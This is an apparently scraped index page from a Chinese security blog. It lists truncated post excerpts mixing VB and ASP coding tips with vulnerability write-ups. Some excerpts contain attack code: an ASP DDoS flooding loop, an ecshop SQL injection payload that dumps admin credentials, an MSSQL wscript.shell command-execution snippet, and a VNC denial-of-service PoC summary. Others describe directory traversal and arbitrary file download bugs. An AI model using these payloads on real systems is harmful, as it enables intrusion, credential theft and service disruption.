“ 哎哟,哥们儿,还捣鼓汇编呢?那东西没用,兄弟用VB"钓"一个API就够你忙活个十天半月的,还不一定搞出来。”此君之言倒也不虚,那吾等还有无
【游戏】求生之路2寂静岭地图攻略
求生之路2第三方地图寂静岭全视频攻略: https://lcx.cc/post/273/ --------------------------------------------------------------------------------------- 8关分别是:表世界寂静岭,学校,里世界学校,表世界教堂,医院,里世界医院,另外个教堂,水处理设施 第
PHP 双字节、宽字节编码漏洞
看了《黑防09精华》这篇《双字节编码 php的隐形杀手》,记录一下。 还是用一个demo.php显示效果,代码如下: <?php header("Content-Type:text/html;Charset=gb2312"); echo $_GET["str"]; //受污染的,但还有
【转载】艰难插入一国外站(趣事)
出处:H4ckx7's Blog 在公司做完事闲得蛋疼了同事发来个老外政府站的注射点!习惯的放进啊D里XXOO一番,当时我偷笑了,DB权限耶,当时没想
【Asp代码】用Asp来搞DDOS攻击
DDOS代码: <% 'On Error Resume Next Dim Tmp, Atk Atk = 1024 '发包数量 Tmp = String(1024,"A") '产生1kb垃圾数据 Set Xml = Server.CreateObject("Microsoft.xmlhttp") StarTime = Timer() '记录开始时间 For i=1 to Atk Xml.Open "Post", "http://127.0.0.1:90/", Flase '打开URL Xml.Send Tmp '发送垃
【漏洞】ecshop前缀修改后的注入代码
解决ecshop数据库前缀修改后不能注入的问题 <?php $p="ecs_"; $p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p; $arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#"=>"1"); $exp = array("attr"=>$arr); $exp = base64_encode(serialize($exp)); //echo $exp; ?> <textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>
【视频】最新广播体操看时不要吃饭喝水
我了个操..神游网络时发现的、、
【事件】黑了红客zeles
作者:臭小子
【Poc】VNC4.1.3溢出漏洞利用代码
Vulnerability............Denial-of-Service Software.................RealVNC VNC Server Free Edition 4.1.3 Download.................http://www.realvnc.com/products/free/4.1/download.html Date.....................5/2/10 Site.....................http://cross-site-scripting.blogspot.com/ Email....................john.leitch5@gmail.com ##Description# Sending a ClientCutText Message with a length of 0xFFFFFFFF crashes the server with the exception shown below. Note: while the vulnerability is present regardless of authentication, for the sake of simplicity this script only works on servers configured to run with no authentication. winvnc4.exe: The instruction at 0x425BE4 referenced memory at 0xFFFFFF00. The memory could not be written
【漏洞】STCMS V3.3 下载任意文件漏洞
大家好,我是子↘仪,STCMS V3.3存在一个下载任意文件的漏洞,这个漏洞是我的好友可乐发现的, 我来做一下简单分析。 漏洞存在于media.p
【转载】MsSql的DB权限执行系统命令
先声明,以下代码不是利用BUG,而是该管理员的设置失误造成的,几率不大。 DECLARE @s int EXEC sp_oacreate [wscript.shell],@s out EXEC sp_oamethod @s,[run],null,[cmd.exe /c 命令] -- 这个就是设置失误,我们利用以上代码可以
维基泄密网站专泄国家机密 美政府无可奈何
据新华网报道,近期,一个名叫Wikileaks(中文译名“维基泄密”)的网站名声大噪,初始原因是,今年4月初“维基泄密”披露了美国直升机滥杀
【转载】商达讯网店系统淘宝拍拍分店版注射
官网:http://www.sungoto.com/ 程序我感觉是抄袭的。不过又说不出来,到底抄袭的哪个程序。先随便看了下代码,发现到了每一个
【转载】关于iis7.0 通杀的真实图解
作者:低调 首发:刀客城 今天晚上嗷嗷的郁闷。。- -群里一位朋友甩了个网站出来,卟一会就成功拿下了shell
【转载】腾讯的管理系统是这样的
用QQ号作为管理系统的帐户。一个帐户可以同时可以管理多个网站。 下面一个是正在调试的网站的后台,用的是独立的后台,这样的网站在腾讯中很少见。
【漏洞】nginx遍历目录0day
针对版本:<= 0.6.36 测试系统:windows2003服务器 通过“../”来操控URL,不仅能遍历web的目录,还能遍历web服务器上的任意
【转载】建立公网VPN
作者:Black 信息来源:Black's blog(http://hi.baidu.com/0x4i) 请大家发帖时附上原版权! 首先,准备好用到
【漏洞】PHPCMS2008任意文件下载漏洞
PHPCMS2008 100527版本网站管理系统下载任意文件漏洞 5月24日,PHPcms2008 SP4出了一个下载任意文件的漏洞。 https://www.lcx.cc/post/123/ 5月27日,该系统官方出了
【漏洞公布】Kindeditor遍历目录0DAY
作者:子↘仪 版本:3.4.2 介绍:KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容I
【VB技巧】VB比较时间
msgbox DateDIff("S","2009-12-18 9:42:40","2009-12-18 9:42:45") 'S:以秒为单位;H以小时为单位;D:以天为单位;M:以月为单位;Y:以天为单位 DateDiff DateDiff: 返回 Variant (Long) 的值,表示两个指定日期间的时间间隔数目。
【VB技巧】VB Timer按任意时间间隔执行
VB Timer按任意时间间隔执行,VB timer按分钟执行,VB timer按小时执行。 Dim TmpTime As String, NowTime As String '临时时间,当前时间 Private Sub Timer1_Timer() NowTime = Year(Date) & "-" & Month(Date) &
【VB技巧】VB播放wav资源文件
VB播放wav资源文件: Private Declare Function sndPlaySound Lib "winmm.dll" Alias "sndPlaySoundA" (lpszSoundName As Any, ByVal uFlags As Long) As Long Private Const SND_ASYNC = &H1 '将控制权立即转让给程序 Private Const SND_NODEFAULT = &H2 '不使用缺省声音 Private Const SND_MEMORY = &H4 '指向一个内
【VB技巧】VB判断字符串中汉字个数
VB判断字符串中汉字个数/判断汉字个数: Public Function CLen(S As String) As Integer '判断汉字个数 Dim I, Tmp For I = 1 To Len(S) Tmp = Mid(S, I, 1) If Asc(Tmp) < 0 Then CLen = CLen + 1 Next End Function
【VB技巧】VB窗体淡入淡出效果
窗体淡入淡出效果: Private Declare Function SetLayeredWindowAttributes Lib "user32" (ByVal hWnd As Long, ByVal crKey As Long, ByVal bAlpha As Byte, ByVal dwFlags As Long) As Boolean Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As
【VB技巧】VB中直接重启/强制重启
VB中直接重启/强制重启/相当于按下重启键: Private Declare Function RtlAdjustPrivilege& Lib "ntdll" (ByVal Privilege&, ByVal Newvalue&, ByVal NewThread&, Oldvalue&) Private Declare Function NtShutdownSystem& Lib "ntdll" (ByVal ShutdownAction&) Private Sub Form_Load() RtlAdjustPrivilege& 19, 1, 0, 0 NtShutdownSystem& 0 Or 2 End Sub
【Asp技巧】Asp网站目录打包与解包
ASP将整个目录所有文件打包为二进制mdb数据库文件 打包程序: <% 'On Error Resume Next '容错处理 Server.ScriptTimeOut = 300 '定义脚本超时时间 Dim Fso, Rs, Conn, Stream, AdoCataLog '定义用到的组件 Set Fso =
【技巧】HTTP响应代码中文详解
HTTP Response Status Code -- HTTP响应代码中文详解 1xx - 信息提示 这些状态代码表示临时的响应。客户端在收到常规响应之前,应准备接收一个或多个 1xx 响应。 · 100 - Continue 初始
【技巧】Windows 开机报警音详解
Windows 开机报警音详解 AMI 一短声:内存 两短声:parity check 三短声:内存前64K 四短声:系统定时器 五短声:cpu 六短声:键盘控制线路 七短声:cpu虚
【PHP技巧】PHP服务器变量$_SERVER详解
服务器变量$_SERVER详解 1、$_SESSION['PHP_SELF'] — 获取当前正在执行脚本的文件名 2、$_SERVER['SERVE
【漏洞】phpcms2008sp4 IIS下下载任意文件漏洞
受影响系统:phpcms2008sp4_UTF8_100510 测试方法: 注册会员 发布一篇下载的文章(不需要通过审核) 然后预览,再点下载即可。